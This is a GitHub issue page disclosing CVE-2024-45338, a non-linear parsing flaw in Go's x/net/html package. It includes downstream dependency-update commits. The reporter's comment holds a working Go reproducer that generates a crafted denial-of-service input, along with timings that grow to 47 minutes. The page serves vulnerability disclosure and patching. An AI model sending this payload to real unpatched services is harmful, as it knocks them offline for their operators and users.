Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

x/net/html: non-linear parsing of case-insensitive content #70906

Closed
rolandshoemaker opened this issue Dec 18, 2024 · 3 comments
Closed

x/net/html: non-linear parsing of case-insensitive content #70906

rolandshoemaker opened this issue Dec 18, 2024 · 3 comments
Labels
NeedsFix The path to resolution is known, but the work has not been done. Security
Milestone

Comments

@rolandshoemaker
Copy link
Member

rolandshoemaker commented Dec 18, 2024

An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing.

Thanks to Guido Vranken for reporting this issue.

This is CVE-2024-45338.

@gabyhelp

This comment was marked as off-topic.

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/637536 mentions this issue: html: use strings.EqualFold instead of lowering ourselves

@dmitshur dmitshur added the NeedsFix The path to resolution is known, but the work has not been done. label Dec 18, 2024
@dmitshur dmitshur added this to the Unreleased milestone Dec 18, 2024
@rolandshoemaker rolandshoemaker changed the title security: fix CVE-2024-45338 x/net/html: non-linear parsing of case-insensitive content Dec 18, 2024
glours added a commit to glours/compose that referenced this issue Dec 19, 2024
brianmcarey added a commit to brianmcarey/kubevirt that referenced this issue Dec 19, 2024
A high vulnerability(CVE-2024-45338)[1] is resolved in golang.org/x/net
v0.33.0[2]

Update to this verion.

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-45338
[2] golang/go#70906

Signed-off-by: Brian Carey <[email protected]>
unexge pushed a commit to awslabs/mountpoint-s3-csi-driver that referenced this issue Dec 19, 2024
*Issue #, if available:* golang/go#70906

*Description of changes:*

This change updates the version of the net/html package provided by the
Golang project.

By submitting this pull request, I confirm that you can use, modify,
copy, and redistribute this contribution, under the terms of your
choice.

Signed-off-by: Daniel Carl Jones <[email protected]>
haaag added a commit to haaag/gm that referenced this issue Dec 19, 2024
Reference:
- [CVE-2024-45338](GHSA-w32m-9786-jp63)
- [x/net/html: non-linear parsing of case-insensitive content
  golang/go#70906](golang/go#70906)
@guidovranken
Copy link

The following reproducer prints the execution time of html.Parse() to process 1, 2, 4, 8, 16, 32, 64, 128, 256, 512 and 1024 kilobytes of crafted input.

package main

import (
    "golang.org/x/net/html"
    "strings"
    "bytes"
    "fmt"
    "time"
)

func generate(size int) []byte {
    size1 := size / 2
    size2 := size / 8
    out := []byte("<math><Annotation-xml encoding=")
    out = append(out, bytes.Repeat([]byte{0xFF}, size1)...)
    out = append(out, bytes.Repeat([]byte("><</"), size2)...)
    return out
}

func main() {
    for kb := 1; kb <= 1024; kb *= 2 {
        data := generate(1024 * kb)
        start := time.Now()
        html.Parse(strings.NewReader(string(data)))
        duration := time.Since(start)
        fmt.Printf("Parsing %d kb took %s\n", kb, duration)
    }
}

Output on AMD Ryzen 5 5600G, Linux x64 using go1.23.2 linux/amd64 (from https://go.dev/dl/go1.23.2.linux-amd64.tar.gz)

Parsing 1 kb took 3.08939ms
Parsing 2 kb took 11.730778ms
Parsing 4 kb took 37.71703ms
Parsing 8 kb took 146.944095ms
Parsing 16 kb took 605.988269ms
Parsing 32 kb took 2.341168259s
Parsing 64 kb took 9.875122735s
Parsing 128 kb took 41.930787863s
Parsing 256 kb took 2m59.680417561s
Parsing 512 kb took 12m2.349134038s
Parsing 1024 kb took 47m38.232269575s

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
NeedsFix The path to resolution is known, but the work has not been done. Security
Projects
None yet
Development

No branches or pull requests

5 participants